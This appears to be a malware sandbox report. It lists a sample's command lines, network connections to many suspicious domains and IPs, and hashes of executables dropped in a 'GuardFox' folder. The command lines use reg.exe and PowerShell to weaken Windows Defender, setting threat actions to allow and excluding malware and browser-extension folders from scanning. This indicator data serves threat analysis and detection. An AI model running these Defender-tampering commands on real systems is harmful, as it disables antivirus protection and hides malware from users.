"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IiRTlIkCOmnQC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IiRTlIkCOmnQC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LoqUitafHMeQMjVNAtR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LoqUitafHMeQMjVNAtR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NXJhSTlNVQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NXJhSTlNVQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mePNjhakU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mePNjhakU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zzVcilLLhiPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zzVcilLLhiPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LSnoZghYDRjXCXVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LSnoZghYDRjXCXVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mMqUxMafZteBAeom\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mMqUxMafZteBAeom\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LoqUitafHMeQMjVNAtR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LoqUitafHMeQMjVNAtR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NXJhSTlNVQUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NXJhSTlNVQUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mePNjhakU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mePNjhakU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zzVcilLLhiPU2" /t REG_DWORD /d 0 /reg:32
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 45.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 59.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | triedchicken.net | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 8.8.8.8:53 | cleued.com | udp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 104.21.67.206:80 | 294down-river.sbs | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 104.21.29.103:80 | def.bestsup.su | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 188.114.97.2:443 | acenitive.shop | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 104.21.4.60:443 | cleued.com | tcp |
| US | 104.21.91.214:443 | triedchicken.net | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 188.114.97.2:443 | acenitive.shop | tcp |
| US | 104.21.67.206:443 | 294down-river.sbs | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| KR | 211.168.53.110:80 | cczhk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| US | 8.8.8.8:53 | pergor.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 127.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.91.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.4.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.29.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.129.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.53.168.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 172.67.156.81:443 | pergor.com | tcp |
| GB | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| KR | 211.168.53.110:80 | cczhk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 8.8.8.8:53 | carthewasher.net | udp |
| US | 188.114.96.2:443 | carthewasher.net | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| US | 8.8.8.8:53 | 81.156.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.136.104.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-22.userapi.com | udp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.206.142.95.in-addr.arpa | udp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | psv4.userapi.com | udp |
| RU | 87.240.137.134:443 | psv4.userapi.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-20.userapi.com | udp |
| NL | 95.142.206.0:443 | sun6-20.userapi.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-21.userapi.com | udp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| NL | 95.142.206.0:443 | sun6-20.userapi.com | tcp |
| US | 8.8.8.8:53 | 134.137.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.206.142.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.206.142.95.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| US | 8.8.8.8:53 | 24.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.63.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.4.21.104.in-addr.arpa | udp |
| RU | 193.233.132.67:50505 | tcp | |
| US | 8.8.8.8:53 | villagemagneticcsa.fun | udp |
| US | 8.8.8.8:53 | healthproline.pro | udp |
| US | 188.114.96.2:443 | healthproline.pro | tcp |
| US | 8.8.8.8:53 | chocolatedepressofw.fun | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 8.8.8.8:53 | theoryapparatusjuko.fun | udp |
| US | 8.8.8.8:53 | prescriptionstorageag.fun | udp |
| US | 8.8.8.8:53 | snuggleapplicationswo.fun | udp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | smallrabbitcrossing.site | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | punchtelephoneverdi.store | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 8.8.8.8:53 | telephoneverdictyow.site | udp |
| US | 104.21.76.253:443 | turkeyunlikelyofw.shop | tcp |
| US | 8.8.8.8:53 | strainriskpropos.store | udp |
| US | 8.8.8.8:53 | associationokeo.shop | udp |
| US | 172.67.147.18:443 | associationokeo.shop | tcp |
| US | 8.8.8.8:53 | 67.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.76.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.147.67.172.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 8.8.8.8:53 | 46.16.20.195.in-addr.arpa | udp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| RU | 5.42.65.31:48396 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.65.42.5.in-addr.arpa | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| DE | 159.69.103.8:9001 | 159.69.103.8 | tcp |
| DE | 159.69.103.8:9001 | 159.69.103.8 | tcp |
| DE | 159.69.103.8:9001 | 159.69.103.8 | tcp |
| DE | 159.69.103.8:9001 | 159.69.103.8 | tcp |
| US | 8.8.8.8:53 | 1ade4581-166c-46b1-a668-d765375a1246.uuid.alldatadump.org | udp |
| US | 8.8.8.8:53 | sjyey.com | udp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | 67.230.53.211.in-addr.arpa | udp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | server6.alldatadump.org | udp |
| US | 8.8.8.8:53 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.108:443 | server6.alldatadump.org | tcp |
| IT | 142.251.27.127:19302 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| US | 104.21.23.184:443 | walkinglate.com | tcp |
| US | 8.8.8.8:53 | 127.27.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | 184.23.21.104.in-addr.arpa | udp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| BG | 185.82.216.108:443 | server6.alldatadump.org | tcp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| BG | 185.82.216.108:443 | server6.alldatadump.org | tcp |
Files
memory/4996-0-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/4996-1-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/4996-3-0x00007FF8C1040000-0x00007FF8C1309000-memory.dmp
memory/4996-2-0x00007FF880000000-0x00007FF880002000-memory.dmp
memory/4996-4-0x00007FF8C1040000-0x00007FF8C1309000-memory.dmp
memory/4996-5-0x00007FF8C1040000-0x00007FF8C1309000-memory.dmp
memory/4996-6-0x00007FF8C38D0000-0x00007FF8C3AC5000-memory.dmp
memory/4996-7-0x00007FF880030000-0x00007FF880031000-memory.dmp
memory/4996-8-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/4996-9-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/4996-10-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/4996-11-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/4996-12-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/4996-13-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/4996-21-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/4996-38-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe
| MD5 | 87cb105ea0c6229687819a5a774cdf20 |
| SHA1 | dc8b201b3c70183499a513c418244f467d8ed8e4 |
| SHA256 | 819a4f6d9ee90ee1f3c2503cc82ea0b6adaea72fc9a9aedd2a060099730493fb |
| SHA512 | 5bc547f9c860c0b35cc011d8fbd7ca018daf1a16c92543bee488ae707523710eec6643d199d42efaf82ced910c3cdbcebcb17ce046b052fc3dd78fd252b76b1b |
C:\Users\Admin\Documents\GuardFox\evl5AhAqx92wdfRi532WmaQN.exe
| MD5 | 8f8ba882e916d2448f421805d52b2da7 |
| SHA1 | d7e4f0fd179268698f967a4edba744b02602c49b |
| SHA256 | e00c81ac50440e90eb021802d937767e5ba18cdd1a46538920188682f263ec65 |
| SHA512 | 2262accff33c4bdc0f4e5a7fd2b3d7e5e73445fcb03deea994fac70cf4e9f4965a75194eb9f2096b734dd4279221e4578a905b6cc3dbb6c89af470706d6bef65 |
C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe
| MD5 | 011b781f2fd9a06a32f2a5b6cd847a12 |
| SHA1 | 3a1333bf55ca87f99ad012f69a57ed84a0f8a8df |
| SHA256 | 0d0ee3c64c5b7756313658a5a633cb2e03d20406d8283c073e164f25c1647e26 |
| SHA512 | 9f384faadfc110a59e67b1eeeebfca8a44dd34d5d87c66504fd5ab412d58319fe9dfe082c394dae26505ef326bd395308c0ca05356306674525853a8390a6d12 |
C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe
| MD5 | 9eecbb5ad7d465190485a8cdb04cd406 |
| SHA1 | 7ccc8d9300163ec6bd0a3bf29900ed0a49fd1ecf |
| SHA256 | 88b54b8b78851084ff7e170ba52c51240d887606a26af3a6c62913804b3541a6 |
| SHA512 | 92c16c83836fc17b369760399920d67951797e228304a8ada9307dd9bef755c662168c1aa5e6b6f6c4a6ccebdb8d20ad8ddd9df8e34e79103eb081418ba87426 |
C:\Users\Admin\Documents\GuardFox\e1lkxrydipIJfmBIkHJEKZuB.exe
| MD5 | 6696334ce6d64c354dac158b420146da |
| SHA1 | 7260dbbe814ae38cd4cc55f876b79f4b9bee282f |
| SHA256 | 78eb31482cff17c94e4dafecc3ceba9fac3951321cd9f292f750f37b1a7462ff |
| SHA512 | ebf2bac72d511038a9eee85ef88fd7011c3238b811f8b6cdd457b85aff1e648a903958d41420c2988d2f7e597e019dfcc0df5be405eca1dc38cfe86ac4d1b429 |
C:\Users\Admin\Documents\GuardFox\FTX9TSuWx9FxH3XuanhJX4zO.exe
| MD5 | 06589cce6160ef126c8c57ec49276979 |
| SHA1 | c3f7fe377ea41df3d31b97979576adad029c4867 |
| SHA256 | 258d661709da0f9ce8b58959d01b2abf454a9cb0a91b11e065da4cae74372e65 |
| SHA512 | cbb9a7481ae37e418134c0ff771509f78e5b7cfdca0e037e9f3d247fe35b50be18874f1f18bd81a2325215663e10000aa58993a1cdfe9b3530d43f59f215ccc7 |
memory/4996-102-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe
| MD5 | b6ff38aefda8aa267c5999e22d36f106 |
| SHA1 | 15f1e1187d27e92388a5dfd27a9dc6adbd2861f5 |
| SHA256 | e171bce99a2b38e68a7cb57c530373cef59fa147aaaa795f6c4985b4dfe1d008 |
| SHA512 | ee7cf7d0788e14a9684af6f6a913b4b96072405ebf26cb648d16b90f16829e39a857430d24ff3fb4724e3a9b573677c4f4160b4875b5f47fab7aecc2a397b12e |
